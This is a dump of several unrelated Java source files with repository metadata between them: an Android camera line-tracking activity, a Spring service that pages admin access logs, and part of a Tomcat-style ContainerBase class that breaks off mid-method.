set1.intersection(set2); System.out.println("set1 intersect set2 = "+intersection1); for (int i = 6; i < 11; i++) assert intersection1.contains(i); } }
[ "tris.nefzger@gmail.com" ]
tris.nefzger@gmail.com
3266cc9de3b78aacd7212ac90389795a156813e0
ae22baece83d6f7d1ee7b5360b89baf4a646305b
/HW12/TrackingCamera/app/src/main/java/edu/northwestern/li_chunlu2016u/trackingcamera/MainActivity.java
e761ffd0aab276ebd009c9f587cbe289cab5877d
[]
no_license
li-chunlu2016/li-chunlu2016_ME433_2016
29cb528f1bf48b0db96ac67b5af7eafd0234318d
67fe8ba51653114cbaed79a80cdf2b219d08955b
refs/heads/master
2020-12-15T08:33:54.832699
2016-08-10T21:41:46
2016-08-10T21:41:46
55,187,683
0
1
null
null
null
null
UTF-8
Java
false
false
13,530
java
package edu.northwestern.li_chunlu2016u.trackingcamera; import android.support.v7.app.AppCompatActivity; import android.os.Bundle; // libraries import android.app.Activity; import android.graphics.Bitmap; import android.graphics.Canvas; import android.graphics.Paint; import android.graphics.SurfaceTexture; import android.hardware.Camera; import android.os.Bundle; import android.view.SurfaceHolder; import android.view.SurfaceView; import android.view.TextureView; import android.view.WindowManager; import android.widget.SeekBar; import android.widget.TextView; import java.io.IOException; import static android.graphics.Color.blue; import static android.graphics.Color.green; import static android.graphics.Color.red; public class MainActivity extends Activity implements TextureView.SurfaceTextureListener { private Camera mCamera; private TextureView mTextureView; private SurfaceView mSurfaceView; private SurfaceHolder mSurfaceHolder; private Bitmap bmp = Bitmap.createBitmap(640,480,Bitmap.Config.ARGB_8888); private Canvas canvas = new Canvas(bmp); private Paint paint1 = new Paint(); private TextView mTextView; private int threshold; static long prevtime = 0; // for FPS calculation private SeekBar myControl; private TextView myTextView; protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); getWindow().addFlags(WindowManager.LayoutParams.FLAG_KEEP_SCREEN_ON); // keeps the screen from turning off mSurfaceView = (SurfaceView) findViewById(R.id.surfaceview); mSurfaceHolder = mSurfaceView.getHolder(); mTextureView = (TextureView) findViewById(R.id.textureview); mTextureView.setSurfaceTextureListener(this); mTextView = (TextView) findViewById(R.id.cameraStatus); paint1.setColor(0xffff0000); // red paint1.setTextSize(24); myControl = (SeekBar) findViewById(R.id.seek1); myTextView = (TextView) findViewById(R.id.textView01); myControl.setMax(200); myControl.setKeyProgressIncrement(1); myTextView.setText("Enter whatever you Like!"); setMyControlListener(); threshold = 150; } private void setMyControlListener() { myControl.setOnSeekBarChangeListener(new SeekBar.OnSeekBarChangeListener() { @Override public void onProgressChanged(SeekBar seekBar, int progress, boolean fromUser) { threshold = progress; myTextView.setText("Threshold: "+progress); } @Override public void onStartTrackingTouch(SeekBar seekBar) { } @Override public void onStopTrackingTouch(SeekBar seekBar) { } }); } public void onSurfaceTextureAvailable(SurfaceTexture surface, int width, int height) { mCamera = Camera.open(); Camera.Parameters parameters = mCamera.getParameters(); parameters.setPreviewSize(640, 480); parameters.setColorEffect(Camera.Parameters.EFFECT_NONE); // black and white parameters.setFocusMode(Camera.Parameters.FOCUS_MODE_INFINITY); // no autofocusing parameters.setAutoWhiteBalanceLock(true); //parameters.setFlashMode(Camera.Parameters.FLASH_MODE_TORCH); mCamera.setParameters(parameters); mCamera.setDisplayOrientation(90); // rotate to portrait mode try { mCamera.setPreviewTexture(surface); mCamera.startPreview(); } catch (IOException ioe) { // Something bad happened } } public void onSurfaceTextureSizeChanged(SurfaceTexture surface, int width, int height) { // Ignored, Camera does all the work for us } public boolean onSurfaceTextureDestroyed(SurfaceTexture surface) { mCamera.stopPreview(); mCamera.release(); return true; } // the important function public void onSurfaceTextureUpdated(SurfaceTexture surface) { // Invoked every time there's a new Camera preview frame mTextureView.getBitmap(bmp); final Canvas c = mSurfaceHolder.lockCanvas(); if (c != null) { int[] pixels = new int[bmp.getWidth()]; int[] pixels1 = new int[bmp.getWidth()]; int[] pixels2 = new int[bmp.getWidth()]; int[] pixels3 = new int[bmp.getWidth()]; int[] pixels4 = new int[bmp.getWidth()]; int[] pixels5 = new int[bmp.getWidth()]; int startY = 50; // which row in the bitmap to analyse to read int startY1 = 100; int startY2 = 150; int startY3 = 200; int startY4 = 300; int startY5 = 400; // only look at one row in the image bmp.getPixels(pixels, 0, bmp.getWidth(), 0, startY, bmp.getWidth(), 1); // (array name, offset inside array, stride (size of row), start x, start y, num pixels to read per row, num rows to read) bmp.getPixels(pixels1, 0, bmp.getWidth(), 0, startY1, bmp.getWidth(), 1); bmp.getPixels(pixels2, 0, bmp.getWidth(), 0, startY2, bmp.getWidth(), 1); bmp.getPixels(pixels3, 0, bmp.getWidth(), 0, startY3, bmp.getWidth(), 1); bmp.getPixels(pixels4, 0, bmp.getWidth(), 0, startY4, bmp.getWidth(), 1); bmp.getPixels(pixels5, 0, bmp.getWidth(), 0, startY5, bmp.getWidth(), 1); // pixels[] is the RGBA data (in black an white). // instead of doing center of mass on it, decide if each pixel is dark enough to consider black or white // then do a center of mass on the thresholded array int[] thresholdedPixels = new int[bmp.getWidth()]; int wbTotal = 0; // total mass int wbCOM = 0; // total (mass time position) for (int i = 0; i < bmp.getWidth(); i++) { // sum the red, green and blue, subtract from 255 to get the darkness of the pixel. // if it is greater than some value (600 here), consider it black // play with the 600 value if you are having issues reliably seeing the line if (255-red(pixels[i]) < threshold) { thresholdedPixels[i] = 255*3; } else { thresholdedPixels[i] = 0; } wbTotal = wbTotal + thresholdedPixels[i]; wbCOM = wbCOM + thresholdedPixels[i]*i; } int COM; //watch out for divide by 0 if (wbTotal<=0) { COM = bmp.getWidth()/2; } else { COM = wbCOM/wbTotal; } int[] thresholdedPixels1 = new int[bmp.getWidth()]; int wbTotal1 = 0; // total mass int wbCOM1 = 0; // total (mass time position) for (int i = 0; i < bmp.getWidth(); i++) { // sum the red, green and blue, subtract from 255 to get the darkness of the pixel. // if it is greater than some value (600 here), consider it black // play with the 600 value if you are having issues reliably seeing the line if (255-red(pixels1[i]) < threshold) { thresholdedPixels1[i] = 255*3; } else { thresholdedPixels1[i] = 0; } wbTotal1 = wbTotal1 + thresholdedPixels1[i]; wbCOM1 = wbCOM1 + thresholdedPixels1[i]*i; } int COM1; //watch out for divide by 0 if (wbTotal1<=0) { COM1 = bmp.getWidth()/2; } else { COM1 = wbCOM1/wbTotal1; } int[] thresholdedPixels2 = new int[bmp.getWidth()]; int wbTotal2 = 0; // total mass int wbCOM2 = 0; // total (mass time position) for (int i = 0; i < bmp.getWidth(); i++) { // sum the red, green and blue, subtract from 255 to get the darkness of the pixel. // if it is greater than some value (600 here), consider it black // play with the 600 value if you are having issues reliably seeing the line if (255-red(pixels2[i]) < threshold) { thresholdedPixels2[i] = 255*3; } else { thresholdedPixels2[i] = 0; } wbTotal2 = wbTotal2 + thresholdedPixels2[i]; wbCOM2 = wbCOM2 + thresholdedPixels2[i]*i; } int COM2; //watch out for divide by 0 if (wbTotal2<=0) { COM2 = bmp.getWidth()/2; } else { COM2 = wbCOM2/wbTotal2; } int[] thresholdedPixels3 = new int[bmp.getWidth()]; int wbTotal3 = 0; // total mass int wbCOM3 = 0; // total (mass time position) for (int i = 0; i < bmp.getWidth(); i++) { // sum the red, green and blue, subtract from 255 to get the darkness of the pixel. // if it is greater than some value (600 here), consider it black // play with the 600 value if you are having issues reliably seeing the line if (255-red(pixels3[i]) < threshold) { thresholdedPixels3[i] = 255*3; } else { thresholdedPixels3[i] = 0; } wbTotal3 = wbTotal3 + thresholdedPixels3[i]; wbCOM3 = wbCOM3 + thresholdedPixels3[i]*i; } int COM3; //watch out for divide by 0 if (wbTotal3<=0) { COM3 = bmp.getWidth()/2; } else { COM3 = wbCOM3/wbTotal3; } int[] thresholdedPixels4 = new int[bmp.getWidth()]; int wbTotal4 = 0; // total mass int wbCOM4 = 0; // total (mass time position) for (int i = 0; i < bmp.getWidth(); i++) { // sum the red, green and blue, subtract from 255 to get the darkness of the pixel. // if it is greater than some value (600 here), consider it black // play with the 600 value if you are having issues reliably seeing the line if (255-red(pixels4[i]) < threshold) { thresholdedPixels4[i] = 255*3; } else { thresholdedPixels4[i] = 0; } wbTotal4 = wbTotal4 + thresholdedPixels4[i]; wbCOM4 = wbCOM4 + thresholdedPixels4[i]*i; } int COM4; //watch out for divide by 0 if (wbTotal4<=0) { COM4 = bmp.getWidth()/2; } else { COM4 = wbCOM4/wbTotal4; } int[] thresholdedPixels5 = new int[bmp.getWidth()]; int wbTotal5 = 0; // total mass int wbCOM5 = 0; // total (mass time position) for (int i = 0; i < bmp.getWidth(); i++) { // sum the red, green and blue, subtract from 255 to get the darkness of the pixel. // if it is greater than some value (600 here), consider it black // play with the 600 value if you are having issues reliably seeing the line if (255-red(pixels5[i]) < threshold) { thresholdedPixels5[i] = 255*3; } else { thresholdedPixels5[i] = 0; } wbTotal5 = wbTotal5 + thresholdedPixels5[i]; wbCOM5 = wbCOM5 + thresholdedPixels5[i]*i; } int COM5; //watch out for divide by 0 if (wbTotal5<=0) { COM5 = bmp.getWidth()/2; } else { COM5 = wbCOM5/wbTotal5; } // draw a circle where you think the COM is canvas.drawCircle(COM, startY, 5, paint1); canvas.drawCircle(COM1, startY1, 5, paint1); canvas.drawCircle(COM2, startY2, 5, paint1); canvas.drawCircle(COM3, startY3, 5, paint1); canvas.drawCircle(COM4, startY4, 5, paint1); canvas.drawCircle(COM5, startY5, 5, paint1); // also write the value as text canvas.drawText("COM = " + COM, 10, 50, paint1); canvas.drawText("COM1 = " + COM1, 10, 100, paint1); canvas.drawText("COM2 = " + COM2, 10, 150, paint1); canvas.drawText("COM3 = " + COM3, 10, 200, paint1); canvas.drawText("COM4 = " + COM4, 10, 300, paint1); canvas.drawText("COM5 = " + COM5, 10, 400, paint1); //canvas.drawText("R = " + red(pixels[320]), 10, 220, paint1); //canvas.drawText("G = " + green(pixels[320]), 10, 240, paint1); //canvas.drawText("B = " + blue(pixels[320]), 10, 260, paint1); c.drawBitmap(bmp, 0, 0, null); mSurfaceHolder.unlockCanvasAndPost(c); // calculate the FPS to see how fast the code is running long nowtime = System.currentTimeMillis(); long diff = nowtime - prevtime; mTextView.setText("FPS " + 1000/diff); prevtime = nowtime; } } }
[ "li-chunlu2016@u.northwestern.edu" ]
li-chunlu2016@u.northwestern.edu
7d997da735975a3b66140cd29619816ea1f5041f
ea0da569267dde966b8ccc81d76d99e936323176
/core/src/main/java/cn/ztuo/bitrade/service/AdminAccessLogService.java
7bfe6e99a304c84a640eb9db240b489830433554
[]
no_license
nevermorecc/bitrade-parent
ce9bf4878e25388fa4362407bf3f3701104b453c
7791ca0d6e5e3007ba3dda626f11ebc94dbbe5f1
refs/heads/master
2022-12-05T21:10:20.346059
2020-08-19T08:33:38
2020-08-19T08:33:38
285,002,238
0
0
null
2020-08-04T14:18:55
2020-08-04T14:18:54
null
UTF-8
Java
false
false
3,604
java
package cn.ztuo.bitrade.service; import com.querydsl.core.types.OrderSpecifier; import com.querydsl.core.types.Predicate; import com.querydsl.core.types.Projections; import com.querydsl.core.types.dsl.BooleanExpression; import com.querydsl.jpa.impl.JPAQuery; import cn.ztuo.bitrade.constant.PageModel; import cn.ztuo.bitrade.dao.AdminAccessLogDao; import cn.ztuo.bitrade.entity.AdminAccessLog; import cn.ztuo.bitrade.entity.QAdmin; import cn.ztuo.bitrade.entity.QAdminAccessLog; import cn.ztuo.bitrade.pagination.PageResult; import cn.ztuo.bitrade.service.Base.BaseService; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.data.domain.Page; import org.springframework.data.domain.PageImpl; import org.springframework.stereotype.Service; import org.springframework.transaction.annotation.Transactional; import java.util.List; /** * @author Seven * @date 2019年12月19日 */ @Service public class AdminAccessLogService extends BaseService { @Autowired private AdminAccessLogDao adminAccessLogDao; public AdminAccessLog saveLog(AdminAccessLog adminAccessLog) { return adminAccessLogDao.save(adminAccessLog); } public List<AdminAccessLog> queryAll() { return adminAccessLogDao.findAll(); } public AdminAccessLog queryById(Long id) { return adminAccessLogDao.findById(id).orElse(null); } @Transactional(readOnly = true) public PageResult<AdminAccessLog> query(List<Predicate> predicateList, Integer pageNo, Integer pageSize) { List<AdminAccessLog> list; JPAQuery<AdminAccessLog> jpaQuery = queryFactory.selectFrom(QAdminAccessLog.adminAccessLog); if (predicateList != null && predicateList.size() > 0) jpaQuery.where(predicateList.toArray(new Predicate[predicateList.size()])); if (pageNo != null && pageSize != null) { list = jpaQuery.offset((pageNo - 1) * pageSize).limit(pageSize).fetch(); } else { list = jpaQuery.fetch(); } return new PageResult<>(list, jpaQuery.fetchCount());//添加总条数 } public Page<AdminAccessLog> page(List<BooleanExpression> predicates, PageModel pageModel){ JPAQuery<AdminAccessLog> query = queryFactory.select( Projections.fields(AdminAccessLog.class, QAdminAccessLog.adminAccessLog.id.as("id"), QAdminAccessLog.adminAccessLog.accessIp.as("accessIp"), QAdminAccessLog.adminAccessLog.accessMethod.as("accessMethod"), QAdminAccessLog.adminAccessLog.accessTime.as("accessTime"), QAdminAccessLog.adminAccessLog.adminId.as("adminId"), QAdminAccessLog.adminAccessLog.uri.as("uri"), QAdminAccessLog.adminAccessLog.module.as("module"), QAdminAccessLog.adminAccessLog.operation.as("operation"), QAdmin.admin.username.as("adminName")) ).from(QAdminAccessLog.adminAccessLog,QAdmin.admin).where(predicates.toArray(new BooleanExpression[predicates.size()])) ; List<OrderSpecifier> orderSpecifiers = pageModel.getOrderSpecifiers() ; query.orderBy(orderSpecifiers.toArray(new OrderSpecifier[orderSpecifiers.size()])); long total = query.fetchCount() ; query.offset(pageModel.getPageSize()*(pageModel.getPageNo()-1)).limit(pageModel.getPageSize()); List<AdminAccessLog> list = query.fetch() ; return new PageImpl<AdminAccessLog>(list,pageModel.getPageable(),total); } }
[ "ZaneYork@qq.com" ]
ZaneYork@qq.com
e3cf340b0f482df8dd6237a576558634ef5dd3b3
512d4ec693c2ae87c726087103d7869ab4c1b187
/src/main/java/com/vincent/howTomcatWorks/catalina/core/ContainerBase.java
4a4e6e37b1fc201c327ee1cf123fe883ddd60a83
[]
no_license
MonthsEmpty/learntomcat
3faaf2399103bd605a684137e3cbd16460c74959
e9ab77ff93c604c8509aa11e38cb08de40d4c7ac
refs/heads/master
2020-03-19T19:55:52.600446
2018-06-14T08:52:11
2018-06-14T08:52:12
136,880,089
0
0
null
null
null
null
UTF-8
Java
false
false
46,093
java
/* * $Header: /home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/core/ContainerBase.java,v 1.21 2002/06/09 02:19:42 remm Exp $ * $Revision: 1.21 $ * $Date: 2002/06/09 02:19:42 $ * * ==================================================================== * * The Apache Software License, Version 1.1 * * Copyright (c) 1999-2001 The Apache Software Foundation. All rights * reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * 3. The end-user documentation included with the redistribution, if * any, must include the following acknowlegement: * "This product includes software developed by the * Apache Software Foundation (http://www.apache.org/)." * Alternately, this acknowlegement may appear in the software itself, * if and wherever such third-party acknowlegements normally appear. * * 4. The names "The Jakarta Project", "Tomcat", and "Apache Software * Foundation" must not be used to endorse or promote products derived * from this software without prior written permission. For written * permission, please contact apache@apache.org. * * 5. Products derived from this software may not be called "Apache" * nor may "Apache" appear in their names without prior written * permission of the Apache Group. * * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED * WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF * USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT * OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * ==================================================================== * * This software consists of voluntary contributions made by many * individuals on behalf of the Apache Software Foundation. For more * information on the Apache Software Foundation, please see * <http://www.apache.org/>. * * [Additional notices, if required by prior licensing conditions] * */ package com.vincent.howTomcatWorks.catalina.core; import com.vincent.howTomcatWorks.catalina.Cluster; import com.vincent.howTomcatWorks.catalina.Container; import com.vincent.howTomcatWorks.catalina.Lifecycle; import com.vincent.howTomcatWorks.catalina.LifecycleException; import com.vincent.howTomcatWorks.catalina.LifecycleListener; import com.vincent.howTomcatWorks.catalina.Loader; import com.vincent.howTomcatWorks.catalina.Logger; import com.vincent.howTomcatWorks.catalina.Manager; import com.vincent.howTomcatWorks.catalina.Mapper; import com.vincent.howTomcatWorks.catalina.Pipeline; import com.vincent.howTomcatWorks.catalina.Realm; import com.vincent.howTomcatWorks.catalina.Valve; import com.vincent.howTomcatWorks.catalina.util.LifecycleSupport; import com.vincent.howTomcatWorks.catalina.util.StringManager; import javax.naming.directory.DirContext; import javax.servlet.ServletException; import java.beans.PropertyChangeListener; import java.beans.PropertyChangeSupport; import java.io.IOException; import java.security.AccessController; import java.security.PrivilegedAction; import java.util.ArrayList; import java.util.HashMap; import java.util.Hashtable; import java.util.Iterator; /** * Abstract implementation of the <b>Container</b> interface, providing common * functionality required by nearly every implementation. Classes extending * this base class must implement <code>getInfo()</code>, and may implement * a replacement for <code>invoke()</code>. * <p> * All subclasses of this abstract base class will include support for a * Pipeline object that defines the processing to be performed for each request * received by the <code>invoke()</code> method of this class, utilizing the * "Chain of Responsibility" design pattern. A subclass should encapsulate its * own processing functionality as a <code>Valve</code>, and configure this * Valve into the pipeline by calling <code>setBasic()</code>. * <p> * This implementation fires property change events, per the JavaBeans design * pattern, for changes in singleton properties. In addition, it fires the * following <code>ContainerEvent</code> events to listeners who register * themselves with <code>addContainerListener()</code>: * <table border=1> * <tr> * <th>Type</th> * <th>Data</th> * <th>Description</th> * </tr> * <tr> * <td align=center><code>addChild</code></td> * <td align=center><code>Container</code></td> * <td>Child container added to this Container.</td> * </tr> * <tr> * <td align=center><code>addValve</code></td> * <td align=center><code>Valve</code></td> * <td>Valve added to this Container.</td> * </tr> * <tr> * <td align=center><code>removeChild</code></td> * <td align=center><code>Container</code></td> * <td>Child container removed from this Container.</td> * </tr> * <tr> * <td align=center><code>removeValve</code></td> * <td align=center><code>Valve</code></td> * <td>Valve removed from this Container.</td> * </tr> * <tr> * <td align=center><code>start</code></td> * <td align=center><code>null</code></td> * <td>Container was started.</td> * </tr> * <tr> * <td align=center><code>stop</code></td> * <td align=center><code>null</code></td> * <td>Container was stopped.</td> * </tr> * </table> * Subclasses that fire additional events should document them in the * class comments of the implementation class. * * @author Craig R. McClanahan * @version $Revision: 1.21 $ $Date: 2002/06/09 02:19:42 $ */ public abstract class ContainerBase implements Container, Lifecycle, Pipeline { /** * Perform addChild with the permissions of this class. * addChild can be called with the XML parser on the stack, * this allows the XML parser to have fewer privileges than * Tomcat. */ protected class PrivilegedAddChild implements PrivilegedAction { private Container child; PrivilegedAddChild(Container child) { this.child = child; } public Object run() { addChildInternal(child); return null; } } // ----------------------------------------------------- Instance Variables /** * The child Containers belonging to this Container, keyed by name. */ protected HashMap children = new HashMap(); /** * The debugging detail level for this component. */ protected int debug = 0; /** * The lifecycle event support for this component. */ protected LifecycleSupport lifecycle = new LifecycleSupport(this); /** * The container event listeners for this Container. */ protected ArrayList listeners = new ArrayList(); /** * The Loader implementation with which this Container is associated. */ protected Loader loader = null; /** * The Logger implementation with which this Container is associated. */ protected Logger logger = null; /** * The Manager implementation with which this Container is associated. */ protected Manager manager = null; /** * The cluster with which this Container is associated. */ protected Cluster cluster = null; /** * The one and only Mapper associated with this Container, if any. */ protected Mapper mapper = null; /** * The set of Mappers associated with this Container, keyed by protocol. */ protected HashMap mappers = new HashMap(); /** * The Java class name of the default Mapper class for this Container. */ protected String mapperClass = null; /** * The human-readable name of this Container. */ protected String name = null; /** * The parent Container to which this Container is a child. */ protected Container parent = null; /** * The parent class loader to be configured when we install a Loader. */ protected ClassLoader parentClassLoader = null; /** * The Pipeline object with which this Container is associated. */ protected Pipeline pipeline = new StandardPipeline(this); /** * The Realm with which this Container is associated. */ protected Realm realm = null; /** * The resources DirContext object with which this Container is associated. */ protected DirContext resources = null; /** * The string manager for this package. */ protected static StringManager sm = StringManager.getManager(Constants.Package); /** * Has this component been started? */ protected boolean started = false; /** * The property change support for this component. */ protected PropertyChangeSupport support = new PropertyChangeSupport(this); // ------------------------------------------------------------- Properties /** * Return the debugging detail level for this component. */ public int getDebug() { return (this.debug); } /** * Set the debugging detail level for this component. * * @param debug The new debugging detail level */ public void setDebug(int debug) { int oldDebug = this.debug; this.debug = debug; support.firePropertyChange("debug", new Integer(oldDebug), new Integer(this.debug)); } /** * Return descriptive information about this Container implementation and * the corresponding version number, in the format * <code>&lt;description&gt;/&lt;version&gt;</code>. */ public abstract String getInfo(); /** * Return the Loader with which this Container is associated. If there is * no associated Loader, return the Loader associated with our parent * Container (if any); otherwise, return <code>null</code>. */ public Loader getLoader() { if (loader != null) return (loader); if (parent != null) return (parent.getLoader()); return (null); } /** * Set the Loader with which this Container is associated. * * @param loader The newly associated loader */ public synchronized void setLoader(Loader loader) { // Change components if necessary Loader oldLoader = this.loader; if (oldLoader == loader) return; this.loader = loader; // Stop the old component if necessary if (started && (oldLoader != null) && (oldLoader instanceof Lifecycle)) { try { ((Lifecycle) oldLoader).stop(); } catch (LifecycleException e) { log("ContainerBase.setLoader: stop: ", e); } } // Start the new component if necessary if (loader != null) loader.setContainer(this); if (started && (loader != null) && (loader instanceof Lifecycle)) { try { ((Lifecycle) loader).start(); } catch (LifecycleException e) { log("ContainerBase.setLoader: start: ", e); } } // Report this property change to interested listeners support.firePropertyChange("loader", oldLoader, this.loader); } /** * Return the Logger with which this Container is associated. If there is * no associated Logger, return the Logger associated with our parent * Container (if any); otherwise return <code>null</code>. */ public Logger getLogger() { if (logger != null) return (logger); if (parent != null) return (parent.getLogger()); return (null); } /** * Set the Logger with which this Container is associated. * * @param logger The newly associated Logger */ public synchronized void setLogger(Logger logger) { // Change components if necessary Logger oldLogger = this.logger; if (oldLogger == logger) return; this.logger = logger; // Stop the old component if necessary if (started && (oldLogger != null) && (oldLogger instanceof Lifecycle)) { try { ((Lifecycle) oldLogger).stop(); } catch (LifecycleException e) { log("ContainerBase.setLogger: stop: ", e); } } // Start the new component if necessary if (logger != null) logger.setContainer(this); if (started && (logger != null) && (logger instanceof Lifecycle)) { try { ((Lifecycle) logger).start(); } catch (LifecycleException e) { log("ContainerBase.setLogger: start: ", e); } } // Report this property change to interested listeners support.firePropertyChange("logger", oldLogger, this.logger); } /** * Return the Manager with which this Container is associated. If there is * no associated Manager, return the Manager associated with our parent * Container (if any); otherwise return <code>null</code>. */ public Manager getManager() { if (manager != null) return (manager); if (parent != null) return (parent.getManager()); return (null); } /** * Set the Manager with which this Container is associated. * * @param manager The newly associated Manager */ public synchronized void setManager(Manager manager) { // Change components if necessary Manager oldManager = this.manager; if (oldManager == manager) return; this.manager = manager; // Stop the old component if necessary if (started && (oldManager != null) && (oldManager instanceof Lifecycle)) { try { ((Lifecycle) oldManager).stop(); } catch (LifecycleException e) { log("ContainerBase.setManager: stop: ", e); } } // Start the new component if necessary if (manager != null) manager.setContainer(this); if (started && (manager != null) && (manager instanceof Lifecycle)) { try { ((Lifecycle) manager).start(); } catch (LifecycleException e) { log("ContainerBase.setManager: start: ", e); } } // Report this property change to interested listeners support.firePropertyChange("manager", oldManager, this.manager); } /** * Return the Cluster with which this Container is associated. If there is * no associated Cluster, return the Cluster associated with our parent * Container (if any); otherwise return <code>null</code>. */ public Cluster getCluster() { if (cluster != null) return (cluster); if (parent != null) return (parent.getCluster()); return (null); } /** * Set the Cluster with which this Container is associated. * * @param cluster The newly associated Cluster */ public synchronized void setCluster(Cluster cluster) { // Change components if necessary Cluster oldCluster = this.cluster; if (oldCluster == cluster) return; this.cluster = cluster; // Stop the old component if necessary if (started && (oldCluster != null) && (oldCluster instanceof Lifecycle)) { try { ((Lifecycle) oldCluster).stop(); } catch (LifecycleException e) { log("ContainerBase.setCluster: stop: ", e); } } // Start the new component if necessary if (cluster != null) cluster.setContainer(this); if (started && (cluster != null) && (cluster instanceof Lifecycle)) { try { ((Lifecycle) cluster).start(); } catch (LifecycleException e) { log("ContainerBase.setCluster: start: ", e); } } // Report this property change to interested listeners support.firePropertyChange("cluster", oldCluster, this.cluster); } /** * Return a name string (suitable for use by humans) that describes this * Container. Within the set of child containers belonging to a particular * parent, Container names must be unique. */ public String getName() { return (name); } /** * Set a name string (suitable for use by humans) that describes this * Container. Within the set of child containers belonging to a particular * parent, Container names must be unique. * * @param name New name of this container * * @exception IllegalStateException if this Container has already been * added to the children of a parent Container (after which the name * may not be changed) */ public void setName(String name) { String oldName = this.name; this.name = name; support.firePropertyChange("name", oldName, this.name); } /** * Return the Container for which this Container is a child, if there is * one. If there is no defined parent, return <code>null</code>. */ public Container getParent() { return (parent); } /** * Set the parent Container to which this Container is being added as a * child. This Container may refuse to become attached to the specified * Container by throwing an exception. * * @param container Container to which this Container is being added * as a child * * @exception IllegalArgumentException if this Container refuses to become * attached to the specified Container */ public void setParent(Container container) { Container oldParent = this.parent; this.parent = container; support.firePropertyChange("parent", oldParent, this.parent); } /** * Return the parent class loader (if any) for this web application. * This call is meaningful only <strong>after</strong> a Loader has * been configured. */ public ClassLoader getParentClassLoader() { if (parentClassLoader != null) return (parentClassLoader); if (parent != null) return (parent.getParentClassLoader()); return (ClassLoader.getSystemClassLoader()); } /** * Set the parent class loader (if any) for this web application. * This call is meaningful only <strong>before</strong> a Loader has * been configured, and the specified value (if non-null) should be * passed as an argument to the class loader constructor. * * * @param parent The new parent class loader */ public void setParentClassLoader(ClassLoader parent) { ClassLoader oldParentClassLoader = this.parentClassLoader; this.parentClassLoader = parent; support.firePropertyChange("parentClassLoader", oldParentClassLoader, this.parentClassLoader); } /** * Return the Pipeline object that manages the Valves associated with * this Container. */ public Pipeline getPipeline() { return (this.pipeline); } /** * Return the Realm with which this Container is associated. If there is * no associated Realm, return the Realm associated with our parent * Container (if any); otherwise return <code>null</code>. */ public Realm getRealm() { if (realm != null) return (realm); if (parent != null) return (parent.getRealm()); return (null); } /** * Set the Realm with which this Container is associated. * * @param realm The newly associated Realm */ public synchronized void setRealm(Realm realm) { // Change components if necessary Realm oldRealm = this.realm; if (oldRealm == realm) return; this.realm = realm; // Stop the old component if necessary if (started && (oldRealm != null) && (oldRealm instanceof Lifecycle)) { try { ((Lifecycle) oldRealm).stop(); } catch (LifecycleException e) { log("ContainerBase.setRealm: stop: ", e); } } // Start the new component if necessary if (realm != null) realm.setContainer(this); if (started && (realm != null) && (realm instanceof Lifecycle)) { try { ((Lifecycle) realm).start(); } catch (LifecycleException e) { log("ContainerBase.setRealm: start: ", e); } } // Report this property change to interested listeners support.firePropertyChange("realm", oldRealm, this.realm); } /** * Return the resources DirContext object with which this Container is * associated. If there is no associated resources object, return the * resources associated with our parent Container (if any); otherwise * return <code>null</code>. */ public DirContext getResources() { if (resources != null) return (resources); if (parent != null) return (parent.getResources()); return (null); } /** * Set the resources DirContext object with which this Container is * associated. * * @param resources The newly associated DirContext */ public synchronized void setResources(DirContext resources) { // Change components if necessary DirContext oldResources = this.resources; if (oldResources == resources) return; Hashtable env = new Hashtable(); if (getParent() != null) env.put(ProxyDirContext.HOST, getParent().getName()); env.put(ProxyDirContext.CONTEXT, getName()); this.resources = new ProxyDirContext(env, resources); // Report this property change to interested listeners support.firePropertyChange("resources", oldResources, this.resources); } // ------------------------------------------------------ Container Methods /** * Add a new child Container to those associated with this Container, * if supported. Prior to adding this Container to the set of children, * the child's <code>setParent()</code> method must be called, with this * Container as an argument. This method may thrown an * <code>IllegalArgumentException</code> if this Container chooses not * to be attached to the specified Container, in which case it is not added * * @param child New child Container to be added * * @exception IllegalArgumentException if this exception is thrown by * the <code>setParent()</code> method of the child Container * @exception IllegalArgumentException if the new child does not have * a name unique from that of existing children of this Container * @exception IllegalStateException if this Container does not support * child Containers */ public void addChild(Container child) { if (System.getSecurityManager() != null) { PrivilegedAction dp = new PrivilegedAddChild(child); AccessController.doPrivileged(dp); } else { addChildInternal(child); } } private void addChildInternal(Container child) { synchronized(children) { if (children.get(child.getName()) != null) throw new IllegalArgumentException("addChild: Child name '" + child.getName() + "' is not unique"); child.setParent((Container) this); // May throw IAE if (started && (child instanceof Lifecycle)) { try { ((Lifecycle) child).start(); } catch (LifecycleException e) { log("ContainerBase.addChild: start: ", e); throw new IllegalStateException ("ContainerBase.addChild: start: " + e); } } children.put(child.getName(), child); fireContainerEvent(ADD_CHILD_EVENT, child); } } /** * Add a container event listener to this component. * * @param listener The listener to add */ public void addContainerListener(ContainerListener listener) { synchronized (listeners) { listeners.add(listener); } } /** * Add the specified Mapper associated with this Container. * * @param mapper The corresponding Mapper implementation * * @exception IllegalArgumentException if this exception is thrown by * the <code>setContainer()</code> method of the Mapper */ public void addMapper(Mapper mapper) { synchronized(mappers) { if (mappers.get(mapper.getProtocol()) != null) throw new IllegalArgumentException("addMapper: Protocol '" + mapper.getProtocol() + "' is not 